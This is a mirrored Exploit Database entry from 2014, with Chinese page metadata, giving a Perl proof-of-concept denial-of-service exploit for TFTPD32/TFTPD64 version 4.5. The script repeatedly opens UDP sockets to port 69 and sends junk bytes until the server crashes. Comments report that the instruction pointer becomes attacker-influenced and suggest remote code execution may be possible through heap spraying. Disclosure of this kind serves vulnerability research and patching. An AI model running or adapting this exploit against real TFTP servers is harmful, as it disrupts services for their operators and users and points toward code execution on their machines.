TFTPD32 4.5 / TFTPD64 4.5 – Denial of Service (PoC)

• Exploit Database
• 11 阅读

• 作者： Martinez FrostCard
  日期： 2014-05-14
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/33348/

• # Exploit Title: TFTPD32 4.5 / TFTPD64 4.5 DoS poc
  # Date: 13/05/2014
  # Exploit Author: j0s3h4x0r
  # Homepage: http://tftpd32.jounin.net/tftpd32_testimonials.html
  # Software Link: http://tftpd32.jounin.net/download/tftpd32.450.zip
  # Version: 4.5 32 bits / 4.5 64 bits
  # Tested on: [Windows 7 x64]
  
  #this proof of concept code will crash tftpd32 and tftpd64
  #you can try changing $j and $i loop limits
  #most of the times EIP reaches 0x2E373231 == "127." or any string contained in tftpd32 error logs
  #and sometimes EIP reaches addresses similar to 0x00013200 so Remote Code Execution may be possible using some form of heap-spray
  
  ## Exploit-DB Note: $j=5, $i=2500 caused a crash. 
  
  
  
  #!/usr/bin/perl -w
  
  use IO::Socket;
  
  for (my $j = 0; $j < 2; $j++)
  {
  	sleep(2);
  	for (my $i = 0; $i < 1500; $i++)
  	{
  		$st_socket = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error";
  	
  		$p_c_buffer = "\x0c\x0d" x 10;
  	
  		print $st_socket $p_c_buffer;
  	
  		close($st_socket);
  
  		print "sent " . $i . "\n";
  	}
  }
  
  exit;